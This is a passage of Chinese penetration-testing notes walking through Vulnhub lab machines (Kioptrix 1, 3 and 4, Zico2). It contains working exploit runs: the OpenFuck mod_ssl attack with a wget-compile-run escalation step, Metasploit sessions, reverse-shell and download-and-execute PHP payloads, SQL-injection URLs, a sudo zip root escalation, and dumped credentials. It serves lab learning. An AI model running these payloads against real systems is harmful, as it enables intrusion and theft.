OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux root@kali:~# netdiscover Currently scanning: | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- ac:c1:ee:31:3f:25 1 60 Xiaomi Communications Co L 44:03:2c:68:d8:0f 1 60 Intel Corporate 00:0c:29:7c:3a:16 1 60 VMware, Inc. 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 1024/tcp status |_ 100024 1 1024/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/ countryName=-- | Not valid before: 2009-09-26T09:32:06 |_Not valid after: 2010-09-26T09:32:06 |_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 1024/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:7C:3A:16 (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.55 ms OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 443端口的服务 mod_ssl/2.8.4 OpenSSL/0.9.6b 通过 searchsploit mod_ssl 查询相关漏洞 root@kali:~/Desktop# searchsploit mod_ssl --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt --------------------------------------- ---------------------------------------- Shellcodes: No Result 这里可以利用第4个漏洞的exp脚本进行攻击, exploit-db 下载相关exp。 漏洞利用 OpenFuck漏洞利用 这是一个远程溢出的漏洞,下载的exp比较久远需要做一些修改。 编译需要用的 libssl-dev 库,且版本为 apt-get install libssl1.0-dev 在exp中加入头文件 <openssl/rc4.h> 和 <openssl/md5.h> 替换exp中的 wget 后的url为 http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c 第961行,修改为const unsigned char * p,* end; 然后编译 gcc -o OpenFuck 764.c -lcrypto 运行脚本 ./OpenFuck 选择相应我系统版本 这里选择 0x6b 执行相关的命令 ./OpenFuck 0x6b root@kali:~/Desktop# ./OpenFuck 0x6b ******************************************************************* * OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open * ******************************************************************* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE * * #hackarena irc.brasnet.org * * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname * * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam * * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ * ******************************************************************* Establishing SSL connection cipher: 0x4043808c ciphers: 0x80f80e0 Ready to send shellcode Spawning shell... bash: no job control in this shell bash-2.05$ bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace- kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; --04:04:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c => `ptrace-kmod.c' Connecting to dl.packetstormsecurity.net:80... connected! HTTP request sent, awaiting response... 301 Moved Permanently Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following] --04:04:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c => `ptrace-kmod.c' Connecting to dl.packetstormsecurity.net:443... connected! HTTP request sent, awaiting response... 200 OK Length: 3,921 [text/x-csrc] 0K ... 100% @ 3.74 MB/s 04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921] [+] Attached to 6498 [+] Waiting for signal [+] Signal caught [+] Shellcode placed at 0x4001189d [+] Now wait for suid shell... id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) whoami root Samba漏洞利用 实验环境是存在一个samba漏洞的, 这里用到 enum4linux 其利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息, 其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息。 但我本地环境没有检测到samba的版本 该漏洞为 Samba trans2open溢出(Linux x86) 在Samba 2.2.0到2.2.8版本中发现的缓冲区溢出. 同样可以在 searchsploit 查到 这里直接用msf环境进行实验。 msf exploit(linux/samba/trans2open) > show options Module options (exploit/linux/samba/trans2open): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Payload options (linux/x86/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Samba 2.2.x - Bruteforce msf exploit(linux/samba/trans2open) > exploit [*] Started bind handler [*] - Trying return address 0xbffffdfc... [*] - Trying return address 0xbffffcfc... [*] - Trying return address 0xbffffbfc... [*] - Trying return address 0xbffffafc... [*] Command shell session 2 opened ( -> at 2018-05-07 04:47:42 -0400 id uid=0(root) gid=0(root) groups=99(nobody) 总结 虽然说这个实验环境比较老,一些漏洞可能在现实的实战中是很少存在的。但是在这个漏洞利用的过程中可以学到 一些 kali linux 的工具的利用和一些实战的思路。 第十四节 Zico2 title: Vulnhub渗透测试练习 - Zico2 date: 2018-05-05 22:30:35 categories: 笔记 作者:Ukonw vulnhub渗透环境 靶机地址 https://www.vulnhub.com/entry/zico2-1,210/ 练习环境 Kali Linux VirtualBox 信息收集 在信息收集之前需要获取到靶机的IP地址,我靶机在VirtualBox下是 Host-Only 网络模式,而靶机是无法直接进入 系统看到IP地址的。 这里用到一个kali linux下的一个工具 netdiscover 基于ARP的网络扫描工具。 直接执行命令 netdiscover : 这里我们获取到两个IP地址,测试发现正确的是 接下来用 nmap 扫描端口信息 nmap -A 得到80端口上运行着一个Web服务器。 访问该Web服务,在这个时候我们可以用常见的扫描工具对网站进行扫描 漏洞利用 这里我简单对页面进行浏览,发现了一个文件包含漏洞。 view.php?page=tools.html 尝试包含 ../../etc/passwd 成功包含,解下来就尝试扫描目录,因为校园网的原因,只能用 Host-Only 网络模式进行测试,所以一切测试过程 都在 Kali 下进行 这里尝试去扫描网站的目录,用到 kali 下的 dirb 专门用于爆破目录的工具。 得到一个 dbadmin 的目录 这里用到的是一个叫 phpLiteAdmin 服务器应用,版本号为 v1.9.3 尝试找找这个版本的历史漏洞,这个服务是存在一个远程PHP代码注入漏洞的。 这里可以通过搜索引擎搜索相关漏洞详情也可以用 kali 下的 Searchsploit 一个用于Exploit-DB的命令行搜索工 具。 这样们就可以看到漏洞详情,这里我们可以看到利用这个远程PHP代码注入漏洞需要登录的。 所以尝试默认密码 admin ,发现可以直接登录进去。 从 exploit-db 上的资料可以看出,我们需要创建一个数据库,写入一个shell。 这里可以用nc监听端口来反弹shell,也可以用msf生成php目录进行监听。 按照 exploit-db 所说的建立数据库。这里直接创建一个后缀名为 .php 的数据库 shell 并添加表信息 这里在本地的 /var/www/html 目录下创建txt文件 <?php $sock=fsockopen("",2333);exec("/bin/sh -i <&3 >&3 2>&3");?> 然后启动apache web服务器 service apache2 start 然后返回到数据库中添加字段名,类型为 TEXT ,写入PHP代码来下载执行shell <?php system("wget -O /tmp/shell.php; php /tmp/shell.php"); ?> 需要让目标下载执行这串恶意代码,需要一个HTTP请求。 这里我们就可以利用到之前发现的本地文件包含的漏洞了。 我们可以在数据库中发现我们恶意创建的数据库的路径 /usr/databases/shell.php 先用nc监听我们之前设置的端口 2333 这里我们就可以反弹一个shell了。 权限提升 在反弹了shell后,对目录进行检查发现了 /home/zico中有一个 wordpress 目录,是一个常见的CMS 进入查看wp-config.php文件。 发现了用户zico的登录凭证,我们可以用 ssh 来连接。 ssh zico@ 利用 sudo -l 查看目前用户可执行与无法执行的指令; 这里表明当前用户 zico 可以利用root权限无密码执行 tar 和 zip 命令 这里可以利用 touch exploit 创建一个随机文件,并用 zip 命令进行压缩 sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'" sudo 用管理员权限执行 -T 检查文件的完整性。这个参数可以让他执行下一个参数 --unzip-command,在这个参数中写入一个python 的交互shell 由此的到 root 权限,接下来就可以进入 /root 目录了 cat /root/flag.txt 得到flag。 总结 vulnhub里面有很多不同的环境提供渗透,第一次完成一次完整的渗透过程,学到了很多东西。 在文章的开头用到了 kali linux 下的一个工具 netdiscover 基于ARP的网络扫描工具。记得在一个师傅的面 试经验介绍中,他被面试官问到为什么要用arp去探测内网主机,他回答的是相当隐蔽,探测的信息更准确。 主要是因为传统探测远程主机是否存活的方法是通过ICMP协议中的回显应答报文来探测(ping)。很多主机为 了避免被扫描器探测,通过防火墙将ICMP包屏蔽,从而达到在网络中隐藏的目的。 在文章中用到了两种语言的交互shell。分别是php和python,这里参考老外的博客Reverse Shell Cheat Sheet 对于我个人在提权实战经验方面是十分少的,在这次练习中学到了可以利用touch exploit 创建一个随 机文件,并用 zip 命令进行压缩,由此可见还是自己的实战经验太少了。 最后感概下,英文的重要性。国外很多大牛的博客都是很丰富的,而对于一个英语四级425飘过的菜鸡, 我也是很无奈的。只能靠百度翻译了。 第十五节 Kioptrix 3 title: Vulnhub渗透测试练习-Kioptrix 3 date: 2018-05-08 20:01:26 categories: 笔记 作者:Ukonw 信息收集 同样用 netdiscover 发现目标主机。 root@kali:~# netdiscover Currently scanning: | Screen View: Unique Hosts 13 Captured ARP Req/Rep packets, from 4 hosts. Total size: 780 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- ac:c1:ee:31:3f:25 6 360 Xiaomi Communications Co Ltd 44:03:2c:68:d8:0f 2 120 Intel Corporate 00:0c:29:b2:76:40 4 240 VMware, Inc. 00:0c:29:38:2d:6f 1 60 VMware, Inc. 目标IP为 。 用nmap扫描目标主机端口信息。 root@kali:~# nmap -A -sS -n Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT Nmap scan report for Host is up (0.00053s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:38:2D:6F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.53 ms OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds 由扫描信息可以得到 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) OS details: Linux 2.6.9 - 2.6.33 80端口可以看出cms为 Lotus CMS 。 用 dirb 扫描一下网站目录。也可以用御剑扫描目录。发现存在 phpdamin cms后台 漏洞利用 文件包含&后台上传 访问80端口上的WEB服务。 发现url中有点问题 尝试 system=../../../../../etc/passwd 好像不行,尝试 %00. 截断,发现可以读到 /etc/passwd 这里可以结合后面SQLmap跑出来的后台密码得到了一个shell。 root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > /tmp/evil.jpg No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1114 bytes 用 msfvenom 生成一个图片马 我们在后台上传图片的地方上传一个图片 修改已有的图片,并得到图片的名, 利用msf监听端口 利用文件包含,包含上传图片,这个地方比较鸡肋。因为这个绝对路径我们是得不到的。 http://kioptrix3.com/index.php? system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00. 访问返回一个shell。 msf > use multi/handler msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST LHOST => msf exploit(multi/handler) > set LPORT 443 LPORT => 443 msf exploit(multi/handler) > run [*] Started reverse TCP handler on [*] Sending stage (37775 bytes) to [*] Meterpreter session 1 opened ( -> at 2018-05-08 12:53:09 -0400 meterpreter > ls Listing: /home/www/kioptrix3.com ================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 4096 dir 2011-04-15 09:21:17 -0400 cache 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 core 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 data 100644/rw-r--r-- 23126 fil 2011-04-14 12:23:13 -0400 favicon.ico 40755/rwxr-xr-x 4096 dir 2011-04-14 11:32:31 -0400 gallery 100644/rw-r--r-- 26430 fil 2011-04-14 12:23:13 -0400 gnu-lgpl.txt 100644/rw-r--r-- 399 fil 2011-04-14 12:23:13 -0400 index.php 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 modules 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 style 100644/rw-r--r-- 243 fil 2011-04-14 12:23:13 -0400 update.php 权限有点小,很多命令都执行不了的。 SQLmap进行SQL注入 这个站是有的链接有问题,302跳转到 kioptrix3.com 在 etc/passwd 添加 kioptrix3.com service networking restart 重启服务 发现url存在SQL注入。 kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos 先用 sqlmap 进行注入测试,id存在报错注入。 尝试查找下后台管理员账号密码。 Database: gallery Table: dev_accounts [2 entries] +----+------------+---------------------------------------------+ | id | username | password | +----+------------+---------------------------------------------+ | 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | | 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | +----+------------+---------------------------------------------+ 得到管理员账号密码,但是在 无法登录,另外找到一个登录的地方 http://kioptrix3.com/gallery/gadmin/ Database: gallery Table: gallarific_users [2 entries] +----------+----------+ | username | password | +----------+----------+ | admin | n0t7t1k4 | +----------+----------+ 但是可以登录。 这里虽然可以是 root 和 dba 权限,但是没有绝对路径。不能直接用sqlmap进行写shell。 手注sqli http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6# 判断一共有6列 http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6# 得到当前数据库和版本号 http://kioptrix3.com/gallery/gallery.php? id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20w here%20table_schema%20=%20database()# 得到当前数据库所有的表名。 http://kioptrix3.com/gallery/gallery.php? id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%2 0WHERE%20table_name%20=0x6465765f6163636f756e7473# 获取表里的列名。 http://kioptrix3.com/gallery/gallery.php? id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts# Lotus CMS 漏洞 root@kali:~# searchsploit Lotus CMS ------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------- ---------------------------------------- Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py Lotus Core CMS 1.0.1 - Remote File Inclusion | exploits/php/webapps/5866.txt LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt ------------------------------------------------------- ---------------------------------------- Shellcodes: No Result 从查询结果看,有一个本地文件包含和一个远程代码执行, 这里的本地文件包含就是我们之前发现的那个。我们尝试下这个本地文件包含漏洞 尝试发现这个漏洞好像不行。 尝试 LotusCMS 3.0 - 'eval()' Remote Command Execution 发现是一个rb文件。 于是 msf > search LotusCMS Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution 利用这个漏洞进行攻击 msf > use exploit/multi/http/lcms_php_exec msf exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port] [...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI /lcms/ yes URI VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf exploit(multi/http/lcms_php_exec) > set RHOST RHOST => msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp PAYLOAD => generic/shell_bind_tcp msf exploit(multi/http/lcms_php_exec) > set URI / URi => / msf exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port] [...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI / yes URI VHOST no HTTP server virtual host Payload options (generic/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf exploit(multi/http/lcms_php_exec) > run [*] Started bind handler [-] Exploit failed [unreachable]: Rex::HostUnreachable The host ( was unreachable. [*] Exploit completed, but no session was created. msf exploit(multi/http/lcms_php_exec) > set RHOST RHOST => msf exploit(multi/http/lcms_php_exec) > run [*] Started bind handler [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 1 opened ( -> at 2018-05-08 10:02:56 -0400 whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) ls cache core data favicon.ico gallery gnu-lgpl.txt index.php modules style update.php pwd /home/www/kioptrix3.com 我尝试用 cd 命令进入 gallery 目录但是不行, 这里用到 ls -l 可以看到 gallery 目录的文件 ls -l gallery total 156 drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK -rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql -rw-r--r-- 1 root root 252 Apr 12 2011 g.php drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin -rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php -rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php -rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php -rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php -rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php -rw-r--r-- 1 root root 249 Apr 12 2011 index.php -rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK -rw-r--r-- 1 root root 212 Apr 12 2011 login.php -rw-r--r-- 1 root root 213 Apr 12 2011 logout.php -rw-r--r-- 1 root root 249 Apr 12 2011 p.php drwxrwxrwx 2 root root 4096 Apr 12 2011 photos -rw-r--r-- 1 root root 213 Apr 12 2011 photos.php -rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php -rw-r--r-- 1 root root 214 Apr 12 2011 profile.php -rw-r--r-- 1 root root 87 Oct 10 2009 readme.html -rw-r--r-- 1 root root 213 Apr 12 2011 recent.php -rw-r--r-- 1 root root 215 Apr 12 2011 register.php drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin -rw-r--r-- 1 root root 213 Apr 12 2011 search.php -rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php -rw-r--r-- 1 root root 211 Apr 12 2011 tags.php drwxr-xr-x 6 root root 4096 Apr 12 2011 themes -rw-r--r-- 1 root root 56 Oct 10 2009 version.txt -rw-r--r-- 1 root root 211 Apr 12 2011 vote.php 发现 gconfig.php 配置文件, cat 读配置文件。 $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; $GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou"; lotusRCE.sh wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh root@kali:~# chmod +x lotusRCE.sh root@kali:~# ./lotusRCE.sh Path found, now to check for vuln.... </html>Hood3dRob1n Regex found, site is vulnerable to PHP Code Injection! About to try and inject reverse shell.... what IP to use? What PORT? 2333 OK, open your local listener and choose the method for back connect: 1) NetCat -e 3) NetCat Backpipe 5) Exit 2) NetCat /dev/tcp 4) NetCat FIFO #? 1 root@kali:/tmp# nc -lvp 2333 listening on [any] 2333 ... connect to [] from kioptrix3.com [] 56259 whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) 权限提升 尝试用之前SQL注入得到的。 Database: gallery Table: dev_accounts [2 entries] +----+------------+---------------------------------------------+ | id | username | password | +----+------------+---------------------------------------------+ | 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | | 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | +----+------------+---------------------------------------------+ 进行SSH连接,发现第一个账号不能没有多大的作用,不能提权。 连接第二个账号 root@kali:~# ssh loneferret@ loneferret@'s password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README 存在一个 CompanyPolicy.README 文件. checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO 英语比较垃圾,百度翻译的意思是可以通过 sudo ht 对文件进行编辑,创建。 在kali下尝试 loneferret@Kioptrix3:~$ sudo ht Error opening terminal: xterm-256color. 报错不能打开一个 xterm-256color. 终端。 回到本地环境用 xshell 连接是可以打开的 此时按 F3 ,可以输入 /etc/passwd 或者 /etc/sudoers 文件来进行文件编辑 把/etc/passwd当前用户的权限修改和 root 一样即可。 也可以把/etc/sudoers当前用户的权限修改和 root 一样即可。 重新登录SSH。 root@kali:~# ssh loneferret@ loneferret@'s password: Last login: Tue May 8 19:27:01 2018 from uknow-pc Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ root@Kioptrix3:~# id uid=0(root) gid=0(root) groups=0(root),100(users) root@Kioptrix3:~# whoami root 此时已经是 root 权限了。 总结 这次实验过程挺长的,发现了很多地方的问题,第一是发现了 phpmyadmin 我尝试用写日志的方法试试能不能拿到 shell。但是发现 phpmyadmin 变量了不存在 general log 变量。 另外就是这里有个SQL注入,可以用 sqlmap 跑出来,是 root 权限。尝试用 os-shell 写shell。通过了之前用远程 命令执行得到的绝对路径,但是还是无法写入。好像是目录权限的问题。 在 phpmyadmin 下也无法执行 INTO OUTFILE 函数。显示 #1 - Can't create/write to file 。从在命令执行里也 看得出来目录是没有权限的。 在最后补充了一个文件包含和后台上传的利用,这个组合通过文件包含执行图片木马,得到一个shell。虽然说很鸡 肋,还是感觉有点厉害的。 在实验过程中还是想多多尝试多种方法的,但是实验环境还是有限。但在这次实验中还是学到了很多,做了几次 vulnhub 的实验了,感觉提权方面还是有学习到很多。 虽然说这些环境有点不常见甚至奇葩,但是还是在这个过程中学到了 linux 环境下的一些之前一直匮乏的知识。 第十六节 Vulnhub渗透测试练习-Kioptrix 4 title: Vulnhub渗透测试练习-Kioptrix 4 date: 2018-05-17 13:46:30 tags: 作者:Ukonw 信息收集 用 nmap 进行端口扫描。 root@kali:~# nmap -sS -A Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT Nmap scan report for Host is up (0.00037s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:38:2D:6F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2018-05-17T09:58:07-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 0.37 ms OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds 从扫描结果可以得到,开发以下端口信息 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) 访问80端口下的WEB服务。 尝试万能密码绕过 'or 1=1# 绕过失败。 弱密码 admin:admin 也是错误的。 尝试 admin:' ,出现报错。好爆出来了路径 /var/www/checklogin.php 。 存在POST型注入。 漏洞利用 sqlmap进行SQL注入 sqlmap -u --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba 在注入的过程会遇到 302跳转 选择 n 。 sqlmap identified the following injection point(s) with 